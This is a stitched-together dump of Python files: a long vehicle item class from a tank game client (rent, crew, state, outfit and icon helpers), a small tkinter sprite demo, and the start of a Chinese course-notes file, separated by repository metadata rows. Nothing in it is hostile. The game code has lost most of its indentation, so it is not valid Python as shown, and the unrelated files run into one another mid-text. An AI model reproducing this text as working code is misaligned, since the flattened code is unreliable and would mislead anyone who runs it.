@fuelTank.setter
def fuelTank(self, value):
self._fuelTank = value
@property
def optDevices(self):
return self._optDevices
@property
def shells(self):
return self._shells
@property
def equipment(self):
return self._equipment
@property
def equipmentLayout(self):
return self._equipmentLayout
@property
def modules(self):
return (self.chassis,
self.turret if self.hasTurrets else None,
self.gun,
self.engine,
self.radio)
@property
def bonuses(self):
return self._bonuses
@property
def crewIndices(self):
return self._crewIndices
@property
def crew(self):
return self._crew
@crew.setter
def crew(self, value):
self._crew = value
@property
def lastCrew(self):
return self._lastCrew
@property
def hasModulesToSelect(self):
return self._hasModulesToSelect
@property
def isRentable(self):
return self.hasRentPackages and not self.isPurchased
@property
def isPurchased(self):
return self.isInInventory and not self.rentInfo.isRented
def isPreviewAllowed(self):
return not self.isInInventory and not self.isSecret
@property
def rentExpiryTime(self):
return self.rentInfo.rentExpiryTime
@property
def rentCompensation(self):
return self.rentInfo.compensations
@property
def isRentAvailable(self):
return self.maxRentDuration - self.rentLeftTime >= self.minRentDuration if self._rentPackagesInfo.mainRentType == RentType.TIME_RENT else self._rentPackagesInfo.hasAvailableRentPackages and self._rentPackagesInfo.mainRentType in (RentType.SEASON_RENT, RentType.SEASON_CYCLE_RENT)
@property
def isRentPromotion(self):
return checkForTags(self.tags, VEHICLE_TAGS.RENT_PROMOTION) and self.rentExpiryState and self.isRentable and self.isRentAvailable and self.isUnlocked
@property
def minRentPrice(self):
minRentPackage = self.getRentPackage()
return minRentPackage.get('rentPrice', MONEY_UNDEFINED) if minRentPackage is not None else MONEY_UNDEFINED
@property
def isRented(self):
return self.rentInfo.isRented
@property
def currentSeasonRent(self):
return self.rentInfo.getActiveSeasonRent()
@property
def rentLeftTime(self):
return self.rentInfo.getTimeLeft()
@property
def maxRentDuration(self):
return self._maxRentDuration
@property
def minRentDuration(self):
return self._minRentDuration
@property
def rentalIsOver(self):
return self.isRented and self.rentExpiryState and not self.isSelected
@property
def rentalIsActive(self):
return self.isRented and not self.rentExpiryState
@property
def rentLeftBattles(self):
return self.rentInfo.battlesLeft
@property
def isSeasonRent(self):
return bool(self.rentInfo.seasonRent)
@property
def rentExpiryState(self):
return self.rentInfo.getExpiryState()
@property
def type(self):
return set(vehicles.VEHICLE_CLASS_TAGS & self.tags).pop()
@property
def typeUserName(self):
return getTypeUserName(self.type, self.isElite)
@property
def hasTurrets(self):
vDescr = self.descriptor
return len(vDescr.hull.fakeTurrets['lobby']) != len(vDescr.turrets)
@property
def hasBattleTurrets(self):
vDescr = self.descriptor
return len(vDescr.hull.fakeTurrets['battle']) != len(vDescr.turrets)
@property
def ammoMaxSize(self):
return self.descriptor.gun.maxAmmo
@property
def isAmmoFull(self):
return sum((s.count for s in self.shells)) >= self.ammoMaxSize * _NOT_FULL_AMMO_MULTIPLIER
@property
def hasShells(self):
return sum((s.count for s in self.shells)) > 0
@property
def hasCrew(self):
return findFirst(lambda x: x[1] is not None, self.crew) is not None
@property
def hasEquipments(self):
return findFirst(None, self.equipment.regularConsumables) is not None
@property
def hasOptionalDevices(self):
return findFirst(None, self.optDevices) is not None
@property
def modelState(self):
if self.health < 0:
return Vehicle.VEHICLE_STATE.EXPLODED
return Vehicle.VEHICLE_STATE.DESTROYED if self.repairCost > 0 and self.health == 0 else Vehicle.VEHICLE_STATE.UNDAMAGED
@property
def isWheeledTech(self):
return self._descriptor.type.isWheeledVehicle
def getC11nItemNoveltyCounter(self, proxy, item):
newItems = proxy.inventory.getC11nItemsNoveltyCounters(self._descriptor.type)
return newItems.get(item.intCD, 0)
def getC11nItemsNoveltyCounter(self, proxy, itemTypes=None, season=None):
count = 0
newItems = proxy.inventory.getC11nItemsNoveltyCounters(self._descriptor.type)
for itemCD, qtyItems in newItems.iteritems():
item = proxy.getItemByCD(itemCD)
if (itemTypes is None or item.itemTypeID in itemTypes) and (season is None or item.season & season):
count += qtyItems
return count
def getNewC11nItems(self, proxy):
newItemsIds = proxy.inventory.getC11nItemsNoveltyCounters(self._descriptor.type).iterkeys()
newItems = [ proxy.getItemByCD(itemCD) for itemCD in newItemsIds ]
return newItems
def getState(self, isCurrentPlayer=True):
ms = self.modelState
if not self.isInInventory and isCurrentPlayer:
ms = Vehicle.VEHICLE_STATE.NOT_PRESENT
if self.isInBattle:
ms = Vehicle.VEHICLE_STATE.BATTLE
elif self.rentalIsOver:
ms = Vehicle.VEHICLE_STATE.RENTAL_IS_OVER
if self.isPremiumIGR:
ms = Vehicle.VEHICLE_STATE.IGR_RENTAL_IS_OVER
elif self.isTelecom:
ms = Vehicle.VEHICLE_STATE.DEAL_IS_OVER
elif self.isDisabledInPremIGR:
ms = Vehicle.VEHICLE_STATE.IN_PREMIUM_IGR_ONLY
elif self.isInPrebattle:
ms = Vehicle.VEHICLE_STATE.IN_PREBATTLE
elif self.isLocked:
ms = Vehicle.VEHICLE_STATE.LOCKED
elif self.isDisabledInRoaming:
ms = Vehicle.VEHICLE_STATE.SERVER_RESTRICTION
elif self.isRotationGroupLocked:
ms = Vehicle.VEHICLE_STATE.ROTATION_GROUP_LOCKED
ms = self.__checkUndamagedState(ms, isCurrentPlayer)
ms = self.__getRentableState(ms, isCurrentPlayer)
if ms in Vehicle.CAN_SELL_STATES and self.__customState:
ms = self.__customState
return (ms, self.__getStateLevel(ms))
def setCustomState(self, state):
self.__customState = state
def getCustomState(self):
return self.__customState
def clearCustomState(self):
self.__customState = ''
def isCustomStateSet(self):
return self.__customState != ''
    def __checkUndamagedState(self, state, isCurrentPlayer=True):
        if state == Vehicle.VEHICLE_STATE.UNDAMAGED and isCurrentPlayer:
if self.isBroken:
return Vehicle.VEHICLE_STATE.DAMAGED
if not self.isCrewFull:
return Vehicle.VEHICLE_STATE.CREW_NOT_FULL
if not self.isAmmoFull:
return Vehicle.VEHICLE_STATE.AMMO_NOT_FULL
if not self.isRotationGroupLocked and self.rotationGroupNum != 0:
return Vehicle.VEHICLE_STATE.ROTATION_GROUP_UNLOCKED
return state
def __getRentableState(self, state, isCurrentPlayer):
if isCurrentPlayer and self.isRentPromotion and self._rentPackagesInfo.hasAvailableRentPackages:
if not self.isRented:
return Vehicle.VEHICLE_STATE.RENTABLE
return Vehicle.VEHICLE_STATE.RENTABLE_AGAIN
return state
@classmethod
def __getEventVehicles(cls):
return cls.eventsCache.getEventVehicles()
def isRotationApplied(self):
return self.rotationGroupNum != 0
def isGroupReady(self):
return (True, '')
def __getStateLevel(self, state):
if state in (Vehicle.VEHICLE_STATE.CREW_NOT_FULL,
Vehicle.VEHICLE_STATE.DAMAGED,
Vehicle.VEHICLE_STATE.EXPLODED,
Vehicle.VEHICLE_STATE.DESTROYED,
Vehicle.VEHICLE_STATE.SERVER_RESTRICTION,
Vehicle.VEHICLE_STATE.RENTAL_IS_OVER,
Vehicle.VEHICLE_STATE.IGR_RENTAL_IS_OVER,
Vehicle.VEHICLE_STATE.AMMO_NOT_FULL,
Vehicle.VEHICLE_STATE.AMMO_NOT_FULL_EVENTS,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_QUEUE,
Vehicle.VEHICLE_STATE.DEAL_IS_OVER,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_UNIT,
Vehicle.VEHICLE_STATE.ROTATION_GROUP_LOCKED):
return Vehicle.VEHICLE_STATE_LEVEL.CRITICAL
if state in (Vehicle.VEHICLE_STATE.UNDAMAGED, Vehicle.VEHICLE_STATE.ROTATION_GROUP_UNLOCKED):
return Vehicle.VEHICLE_STATE_LEVEL.INFO
return Vehicle.VEHICLE_STATE_LEVEL.RENTABLE if state in (Vehicle.VEHICLE_STATE.RENTABLE, Vehicle.VEHICLE_STATE.RENTABLE_AGAIN) else Vehicle.VEHICLE_STATE_LEVEL.WARNING
@property
def isPremium(self):
return checkForTags(self.tags, VEHICLE_TAGS.PREMIUM)
@property
def isPremiumIGR(self):
return checkForTags(self.tags, VEHICLE_TAGS.PREMIUM_IGR)
@property
def isSecret(self):
return checkForTags(self.tags, VEHICLE_TAGS.SECRET)
@property
def isSpecial(self):
return checkForTags(self.tags, VEHICLE_TAGS.SPECIAL)
@property
def isExcludedFromSandbox(self):
return checkForTags(self.tags, VEHICLE_TAGS.EXCLUDED_FROM_SANDBOX)
@property
def isObserver(self):
return checkForTags(self.tags, VEHICLE_TAGS.OBSERVER)
@property
def isEvent(self):
return self.isOnlyForEventBattles and self in Vehicle.__getEventVehicles()
@property
def isDisabledInRoaming(self):
return checkForTags(self.tags, VEHICLE_TAGS.DISABLED_IN_ROAMING) and self.lobbyContext.getServerSettings().roaming.isInRoaming()
@property
def canNotBeSold(self):
return checkForTags(self.tags, VEHICLE_TAGS.CANNOT_BE_SOLD)
@property
def isUnrecoverable(self):
return checkForTags(self.tags, VEHICLE_TAGS.UNRECOVERABLE)
@property
def isCrewLocked(self):
return checkForTags(self.tags, VEHICLE_TAGS.CREW_LOCKED)
@property
def isOutfitLocked(self):
return checkForTags(self.tags, VEHICLE_TAGS.OUTFIT_LOCKED)
@property
def isDisabledInPremIGR(self):
return self.isPremiumIGR and self.igrCtrl.getRoomType() != constants.IGR_TYPE.PREMIUM
@property
def name(self):
return self.descriptor.type.name
@property
def userName(self):
return getUserName(self.descriptor.type)
@property
def longUserName(self):
typeInfo = getTypeInfoByName('vehicle')
tagsDump = [ typeInfo['tags'][tag]['userString'] for tag in self.tags if typeInfo['tags'][tag]['userString'] != '' ]
return '%s %s' % (''.join(tagsDump), getUserName(self.descriptor.type))
@property
def shortUserName(self):
return getShortUserName(self.descriptor.type)
@property
def level(self):
return self.descriptor.type.level
@property
def fullDescription(self):
description = self.descriptor.type.description
return description if description.find('_descr') == -1 else ''
@property
def shortDescriptionSpecial(self):
description = self.descriptor.type.shortDescriptionSpecial
return description if description.find('_short_special') == -1 else ''
@property
def longDescriptionSpecial(self):
description = self.descriptor.type.longDescriptionSpecial
return description if description.find('_long_special') == -1 else ''
@property
def tags(self):
return self.descriptor.type.tags
@property
def rotationGroupIdx(self):
return self.rotationGroupNum - 1
@property
def canSell(self):
if not self.isInInventory:
return False
st, _ = self.getState()
if self.isRented:
if not self.rentalIsOver:
return False
if st in (self.VEHICLE_STATE.RENTAL_IS_OVER, self.VEHICLE_STATE.IGR_RENTAL_IS_OVER, self.VEHICLE_STATE.RENTABLE_AGAIN):
st = self.__checkUndamagedState(self.modelState)
return st in self.CAN_SELL_STATES and not checkForTags(self.tags, VEHICLE_TAGS.CANNOT_BE_SOLD)
@property
def isLocked(self):
return self.lock[0] != LOCK_REASON.NONE
@property
def isInBattle(self):
return self.lock[0] == LOCK_REASON.ON_ARENA
@property
def isInPrebattle(self):
return self.lock[0] in (LOCK_REASON.PREBATTLE, LOCK_REASON.UNIT)
@property
def isAwaitingBattle(self):
return self.lock[0] == LOCK_REASON.IN_QUEUE
@property
def isInUnit(self):
return self.lock[0] == LOCK_REASON.UNIT
@property
def typeOfLockingArena(self):
return None if not self.isLocked else self.lock[1]
@property
def isBroken(self):
return self.repairCost > 0
@property
def isAlive(self):
return not self.isBroken and not self.isLocked
@property
def isCrewFull(self):
crew = [ tman for _, tman in self.crew ]
return None not in crew and len(crew)
@property
def isOnlyForEventBattles(self):
return checkForTags(self.tags, VEHICLE_TAGS.EVENT)
@property
def isOnlyForEpicBattles(self):
return checkForTags(self.tags, VEHICLE_TAGS.EPIC_BATTLES)
@property
def isTelecom(self):
return checkForTags(self.tags, VEHICLE_TAGS.TELECOM)
@property
def isTelecomDealOver(self):
return self.isTelecom and self.rentExpiryState
def hasLockMode(self):
isBS = prb_getters.isBattleSession()
if isBS:
isBSVehicleLockMode = bool(prb_getters.getPrebattleSettings()[PREBATTLE_SETTING_NAME.VEHICLE_LOCK_MODE])
if isBSVehicleLockMode and self.clanLock > 0:
return True
return False
def isReadyToPrebattle(self, checkForRent=True):
if checkForRent and self.rentalIsOver:
return False
if not self.isGroupReady()[0]:
return False
result = not self.hasLockMode()
if result:
result = not self.isBroken and self.isCrewFull and not self.isDisabledInPremIGR and not self.isInBattle and not self.isRotationGroupLocked
return result
@property
def isReadyToFight(self):
if self.rentalIsOver:
return False
if not self.isGroupReady()[0]:
return False
result = not self.hasLockMode()
if result:
result = self.isAlive and self.isCrewFull and not self.isDisabledInRoaming and not self.isDisabledInPremIGR and not self.isRotationGroupLocked
return result
@property
def isXPToTman(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.XP_TO_TMAN)
@property
def isAutoRepair(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_REPAIR)
@property
def isAutoLoad(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_LOAD)
@property
def isAutoEquip(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_EQUIP)
def isAutoBattleBoosterEquip(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_EQUIP_BOOSTER)
@property
def isFavorite(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.GROUP_0)
@property
def isAutoRentStyle(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_RENT_CUSTOMIZATION)
@prbDispatcherProperty
def __prbDispatcher(self):
return None
def isCustomizationEnabled(self):
locked = False
if self.__prbDispatcher is not None:
permission = self.__prbDispatcher.getGUIPermissions()
if permission is not None:
locked = not permission.canChangeVehicle()
return not self.isOnlyForEventBattles and not self.isInBattle and self.isInInventory and not self.isLocked and not locked and not self.isBroken and not self.rentalIsOver and not self.isOutfitLocked
def isAutoLoadFull(self):
if self.isAutoLoad:
for shell in self.shells:
if shell.count != shell.defaultCount:
return False
return True
def isAutoEquipFull(self):
return self.equipment.regularConsumables == self.equipmentLayout.regularConsumables if self.isAutoEquip else True
def mayPurchase(self, money):
if self.isOnlyForEventBattles:
return (False, 'isDisabledForBuy')
if self.isDisabledForBuy:
return (False, 'isDisabledForBuy')
return (False, 'premiumIGR') if self.isPremiumIGR else super(Vehicle, self).mayPurchase(money)
def mayRent(self, money):
if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE)
if self.isDisabledForBuy and not self.isRentable:
return (False, GUI_ITEM_ECONOMY_CODE.RENTAL_DISABLED)
if self.isRentable and not self.isRentAvailable:
return (False, GUI_ITEM_ECONOMY_CODE.RENTAL_TIME_EXCEEDED)
minRentPrice = self.minRentPrice
return self._isEnoughMoney(minRentPrice, money) if minRentPrice else (False, GUI_ITEM_ECONOMY_CODE.NO_RENT_PRICE)
def mayRestore(self, money):
if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE)
return (False, GUI_ITEM_ECONOMY_CODE.RESTORE_DISABLED) if not self.isRestoreAvailable() or constants.IS_CHINA and self.rentalIsActive else self._isEnoughMoney(self.restorePrice, money)
def mayRestoreWithExchange(self, money, exchangeRate):
mayRestore, reason = self.mayRestore(money)
if mayRestore:
return mayRestore
if reason == GUI_ITEM_ECONOMY_CODE.NOT_ENOUGH_CREDITS and money.isSet(Currency.GOLD):
money = money.exchange(Currency.GOLD, Currency.CREDITS, exchangeRate, default=0)
mayRestore, reason = self._isEnoughMoney(self.restorePrice, money)
return mayRestore
return False
def getRentPackage(self, rentID=None):
if rentID is not None:
for package in self.rentPackages:
if package.get('rentID', None) == rentID:
return package
elif self.rentPackages:
return min(self.rentPackages, key=itemgetter('rentPrice'))
return
def getGUIEmblemID(self):
return self.icon
def getRentPackageActionPrc(self, rentID=None):
package = self.getRentPackage(rentID)
return getActionPrc(package['rentPrice'], package['defaultRentPrice']) if package else 0
def getAutoUnlockedItems(self):
return self.descriptor.type.autounlockedItems[:]
def getAutoUnlockedItemsMap(self):
return dict(((vehicles.getItemByCompactDescr(nodeCD).itemTypeName, nodeCD) for nodeCD in self.descriptor.type.autounlockedItems))
def getUnlocksDescrs(self):
for unlockIdx, data in enumerate(self.descriptor.type.unlocksDescrs):
yield (unlockIdx,
data[0],
data[1],
set(data[2:]))
def getUnlocksDescr(self, unlockIdx):
try:
data = self.descriptor.type.unlocksDescrs[unlockIdx]
except IndexError:
data = (0, 0, set())
return (data[0], data[1], set(data[2:]))
def getPerfectCrew(self):
return self.getCrewBySkillLevels(100)
def getCrewWithoutSkill(self, skillName):
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for slotIdx, tman in self.crew:
if tman and skillName in tman.skillsMap:
tmanDescr = tman.descriptor
skills = tmanDescr.skills[:]
if tmanDescr.skillLevel(skillName) < tankmen.MAX_SKILL_LEVEL:
lastSkillLevel = tankmen.MAX_SKILL_LEVEL
else:
lastSkillLevel = tmanDescr.lastSkillLevel
skills.remove(skillName)
unskilledTman = self.itemsFactory.createTankman(tankmen.generateCompactDescr(tmanDescr.getPassport(), tmanDescr.vehicleTypeID, tmanDescr.role, tmanDescr.roleLevel, skills, lastSkillLevel), vehicle=self)
                crewItems.append((slotIdx, unskilledTman))
            else:
                crewItems.append((slotIdx, tman))
return sortCrew(crewItems, crewRoles)
def getCrewBySkillLevels(self, defRoleLevel, skillsByIdxs=None, levelByIdxs=None, nativeVehsByIdxs=None):
skillsByIdxs = skillsByIdxs or {}
levelByIdxs = levelByIdxs or {}
nativeVehsByIdxs = nativeVehsByIdxs or {}
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for idx, _ in enumerate(crewRoles):
defRoleLevel = levelByIdxs.get(idx, defRoleLevel)
if defRoleLevel is not None:
role = self.descriptor.type.crewRoles[idx][0]
nativeVehicle = nativeVehsByIdxs.get(idx)
if nativeVehicle is not None:
nationID, vehicleTypeID = nativeVehicle.descriptor.type.id
else:
nationID, vehicleTypeID = self.descriptor.type.id
tankman = self.itemsFactory.createTankman(tankmen.generateCompactDescr(tankmen.generatePassport(nationID), vehicleTypeID, role, defRoleLevel, skillsByIdxs.get(idx, [])), vehicle=self)
else:
tankman = None
crewItems.append((idx, tankman))
return sortCrew(crewItems, crewRoles)
def getOutfit(self, season):
for outfit in (self._styledOutfits.get(season), self._customOutfits.get(season)):
if outfit and outfit.isActive():
return outfit
return None
def setCustomOutfit(self, season, outfit):
self._customOutfits[season] = outfit
def setOutfits(self, fromVehicle):
for season in SeasonType.SEASONS:
self._customOutfits[season] = fromVehicle.getCustomOutfit(season)
self._styledOutfits[season] = fromVehicle.getStyledOutfit(season)
def getCustomOutfit(self, season):
return self._customOutfits.get(season)
def getStyledOutfit(self, season):
return self._styledOutfits.get(season)
def hasOutfit(self, season):
outfit = self.getOutfit(season)
return outfit is not None
def hasOutfitWithItems(self, season):
outfit = self.getOutfit(season)
return outfit is not None and not outfit.isEmpty()
def getBonusCamo(self):
for season in SeasonType.SEASONS:
outfit = self.getOutfit(season)
if not outfit:
continue
camo = outfit.hull.slotFor(GUI_ITEM_TYPE.CAMOUFLAGE).getItem()
if camo:
return camo
return None
def getAnyOutfitSeason(self):
activeSeasons = []
for season in SeasonType.COMMON_SEASONS:
if self.hasOutfitWithItems(season):
activeSeasons.append(season)
return random.choice(activeSeasons) if activeSeasons else SeasonType.SUMMER
def isRestorePossible(self):
return self.restoreInfo.isRestorePossible() if not self.isPurchased and not self.isUnrecoverable and self.lobbyContext.getServerSettings().isVehicleRestoreEnabled() and self.restoreInfo is not None else False
def isRestoreAvailable(self):
return self.isRestorePossible() and not self.restoreInfo.isInCooldown()
def hasLimitedRestore(self):
return self.isRestorePossible() and self.restoreInfo.isLimited() and self.restoreInfo.getRestoreTimeLeft() > 0
def hasRestoreCooldown(self):
return self.isRestorePossible() and self.restoreInfo.isInCooldown()
def isRecentlyRestored(self):
return self.isPurchased and self.restoreInfo.isInCooldown() if self.restoreInfo is not None else False
def __cmp__(self, other):
if self.isRestorePossible() and not other.isRestorePossible():
return -1
if not self.isRestorePossible() and other.isRestorePossible():
return 1
return cmp(other.hasLimitedRestore(), self.hasLimitedRestore()) or cmp(self.restoreInfo.getRestoreTimeLeft(), other.restoreInfo.getRestoreTimeLeft()) if self.isRestorePossible() and other.isRestorePossible() else super(Vehicle, self).__cmp__(other)
def __eq__(self, other):
return False if other is None else self.descriptor.type.id == other.descriptor.type.id
def __repr__(self):
return 'Vehicle<id:%d, intCD:%d, nation:%d, lock:%s>' % (self.invID,
self.intCD,
self.nationID,
self.lock)
def _mayPurchase(self, price, money):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE) if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False) else super(Vehicle, self)._mayPurchase(price, money)
def _getShortInfo(self, vehicle=None, expanded=False):
description = i18n.makeString('#menu:descriptions/' + self.itemTypeName)
caliber = self.descriptor.gun.shots[0].shell.caliber
armor = findVehicleArmorMinMax(self.descriptor)
return description % {'weight': BigWorld.wg_getNiceNumberFormat(float(self.descriptor.physics['weight']) / 1000),
'hullArmor': BigWorld.wg_getIntegralFormat(armor[1]),
'caliber': BigWorld.wg_getIntegralFormat(caliber)}
def _sortByType(self, other):
return compareByVehTypeName(self.type, other.type)
def __hasModulesToSelect(self):
components = []
for moduleCD in self.descriptor.type.installableComponents:
moduleType = getTypeOfCompactDescr(moduleCD)
if moduleType == GUI_ITEM_TYPE.FUEL_TANK:
continue
if moduleType in components:
return True
components.append(moduleType)
return False
def __calcMinMaxRentDuration(self):
if self.rentPackages:
maxDays = None
minDays = None
for package in self.rentPackages:
rentID = package.get('rentID', 0)
rentType, days = parseRentID(rentID)
if rentType == RentType.TIME_RENT:
if maxDays is None or days > maxDays:
maxDays = days
if minDays is None or days < minDays:
minDays = days
maxDuration = maxDays * _MAX_RENT_MULTIPLIER * time_utils.ONE_DAY if maxDays else 0
minDuration = minDays * time_utils.ONE_DAY if minDays else 0
return (maxDuration, minDuration)
else:
return (0, 0)
def getTypeUserName(vehType, isElite):
return i18n.makeString('#menu:header/vehicleType/elite/%s' % vehType) if isElite else i18n.makeString('#menu:header/vehicleType/%s' % vehType)
def getTypeShortUserName(vehType):
return i18n.makeString('#menu:classes/short/%s' % vehType)
def _getLevelIconName(vehLevel, postfix=''):
return 'tank_level_%s%d.png' % (postfix, int(vehLevel))
def getLevelBigIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel, 'big_')
def getLevelSmallIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel, 'small_')
def getLevelIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel)
def getIconPath(vehicleName):
return '../maps/icons/vehicle/%s' % getItemIconName(vehicleName)
def getNationLessName(vehicleName):
return vehicleName.split(':')[1]
def getIconShopPath(vehicleName, size=STORE_CONSTANTS.ICON_SIZE_MEDIUM):
name = getNationLessName(vehicleName)
path = RES_SHOP_EXT.getVehicleIcon(size, name)
return func_utils.makeFlashPath(path) if path is not None else '../maps/shop/vehicles/%s/empty_tank.png' % size
def getIconResource(vehicleName):
rName = getIconResourceName(vehicleName=vehicleName)
return R.images.gui.maps.icons.vehicle.dyn(rName)
def getIconResourceName(vehicleName):
return vehicleName.replace(':', '_').replace('-', '_')
def getContourIconPath(vehicleName):
return '../maps/icons/vehicle/contour/%s' % getItemIconName(vehicleName)
def getSmallIconPath(vehicleName):
return '../maps/icons/vehicle/small/%s' % getItemIconName(vehicleName)
def getUniqueIconPath(vehicleName, withLightning=False):
return '../maps/icons/vehicle/unique/%s' % getItemIconName(vehicleName) if withLightning else '../maps/icons/vehicle/unique/normal_%s' % getItemIconName(vehicleName)
def getTypeSmallIconPath(vehicleType, isElite=False):
return RES_ICONS.maps_icons_vehicletypes_elite_all_png(vehicleType) if isElite else RES_ICONS.maps_icons_vehicletypes_all_png(vehicleType)
def getTypeBigIconPath(vehicleType, isElite=False):
return RES_ICONS.getVehicleTypeBigIcon(vehicleType, '_elite' if isElite else '')
def getUserName(vehicleType, textPrefix=False):
return _getActualName(vehicleType.userString, vehicleType.tags, textPrefix)
def getShortUserName(vehicleType, textPrefix=False):
return _getActualName(vehicleType.shortUserString, vehicleType.tags, textPrefix)
def _getActualName(name, tags, textPrefix=False):
if checkForTags(tags, VEHICLE_TAGS.PREMIUM_IGR):
if textPrefix:
return i18n.makeString(ITEM_TYPES.MARKER_IGR, vehName=name)
return makeHtmlString('html_templates:igr/premium-vehicle', 'name', {'vehicle': name})
return name
def checkForTags(vTags, tags):
if not hasattr(tags, '__iter__'):
tags = (tags,)
return bool(vTags & frozenset(tags))
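# Usage sketch (tag values assumed): a bare string is wrapped into a tuple first,
# so both forms work:
#   checkForTags(frozenset(('premium', 'secret')), 'premium')      # -> True
#   checkForTags(frozenset(('premium',)), ('secret', 'observer'))  # -> False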
def findVehicleArmorMinMax(vd):
def findComponentArmorMinMax(armor, minMax):
for value in armor:
if value != 0:
if minMax is None:
minMax = [value, value]
else:
minMax[0] = min(minMax[0], value)
minMax[1] = max(minMax[1], value)
return minMax
minMax = None
minMax = findComponentArmorMinMax(vd.hull.primaryArmor, minMax)
for turrets in vd.type.turrets:
for turret in turrets:
minMax = findComponentArmorMinMax(turret.primaryArmor, minMax)
return minMax
def sortCrew(crewItems, crewRoles):
RO = Tankman.TANKMEN_ROLES_ORDER
return sorted(crewItems, cmp=lambda a, b: RO[crewRoles[a[0]][0]] - RO[crewRoles[b[0]][0]])
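# Illustration (role names assumed): with crewRoles == (('driver',), ('commander',))
# and crewItems == [(0, tmanA), (1, tmanB)], the commander's slot sorts ahead of
# the driver's, because Tankman.TANKMEN_ROLES_ORDER ranks roles, not slot indices.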
def getLobbyDescription(vehicle):
return text_styles.stats(i18n.makeString('#menu:header/level/%s' % vehicle.level)) + ' ' + text_styles.main(i18n.makeString('#menu:header/level', vTypeName=getTypeUserName(vehicle.type, vehicle.isElite)))
def getOrderByVehicleClass(className=None):
if className and className in VEHICLE_BATTLE_TYPES_ORDER_INDICES:
result = VEHICLE_BATTLE_TYPES_ORDER_INDICES[className]
else:
result = UNKNOWN_VEHICLE_CLASS_ORDER
return result
def getVehicleClassTag(tags):
subSet = vehicles.VEHICLE_CLASS_TAGS & tags
result = None
if subSet:
result = list(subSet).pop()
return result
_VEHICLE_STATE_TO_ICON = {Vehicle.VEHICLE_STATE.BATTLE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_BATTLE,
Vehicle.VEHICLE_STATE.IN_PREBATTLE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_INPREBATTLE,
Vehicle.VEHICLE_STATE.DAMAGED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.DESTROYED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.EXPLODED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.CREW_NOT_FULL: RES_ICONS.MAPS_ICONS_VEHICLESTATES_CREWNOTFULL,
Vehicle.VEHICLE_STATE.RENTAL_IS_OVER: RES_ICONS.MAPS_ICONS_VEHICLESTATES_RENTALISOVER,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_UNIT: RES_ICONS.MAPS_ICONS_VEHICLESTATES_UNSUITABLETOUNIT,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_QUEUE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_UNSUITABLETOUNIT,
Vehicle.VEHICLE_STATE.GROUP_IS_NOT_READY: RES_ICONS.MAPS_ICONS_VEHICLESTATES_GROUP_IS_NOT_READY}
_VEHICLE_STATE_TO_ADD_ICON = {Vehicle.VEHICLE_STATE.RENTABLE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_RENT_ICO_BIG,
Vehicle.VEHICLE_STATE.RENTABLE_AGAIN: RES_ICONS.MAPS_ICONS_VEHICLESTATES_RENTAGAIN_ICO_BIG}
def getVehicleStateIcon(vState):
if vState in _VEHICLE_STATE_TO_ICON:
icon = _VEHICLE_STATE_TO_ICON[vState]
else:
icon = ''
return icon
def getVehicleStateAddIcon(vState):
if vState in _VEHICLE_STATE_TO_ADD_ICON:
icon = _VEHICLE_STATE_TO_ADD_ICON[vState]
else:
icon = ''
return icon
def getBattlesLeft(vehicle):
return i18n.makeString('#menu:infinitySymbol') if vehicle.isInfiniteRotationGroup else str(vehicle.rotationBattlesLeft)
cd2b3e03c7d4829e4d97f8148c5adb257164f06b | 9c124f6accd89a3ccf08b4c1205159d78c731f85 | /5/main2.py | 90c084d9fdd727393875c7852c0b3e4be61179b0 | []
| no_license | irongamer54/Sumer_2021 | 5600272dc11bddf6276bb56d0db4cff66ff6b20d | d61348274772cf95f0b06f904bfbb0ec61ebd1b1 | refs/heads/master | 2023-06-26T12:26:41.623768 | 2021-07-23T03:46:18 | 2021-07-23T03:46:18 | 383,372,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py |
from tkinter import *
root = Tk()
canvas = Canvas(root, width=500, height=500)
canvas.pack()
# Load a sprite and draw it anchored at its top-left (NW) corner; "pers.png"
# is assumed to sit in the working directory, per the relative path.
pers_obj = PhotoImage(file="pers.png")
canvas.create_image(50, 50, anchor=NW, image=pers_obj)
root.mainloop()
8dfcde4d529883da7fcaa024d87d1e941b74687a | 6caab8d886e8bd302d1994ff663cf5ccb5e11522 | /MyNotes_01/Step01/3-OO/day02_10/demo02.py | af2d3e088e530fe9803b841cfed86c5256b3275a | []
| no_license | ZimingGuo/MyNotes01 | 7698941223c79ee754b17296b9984b731858b238 | 55e6681da1a9faf9c0ec618ed60f5da9ecc6beb6 | refs/heads/master | 2022-07-30T21:30:32.100042 | 2020-05-19T16:59:09 | 2020-05-19T16:59:09 | 265,254,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py |
# author: Ziming Guo
# time: 2020/2/15
"""
demo02:
类成员
练习:exercise03.py
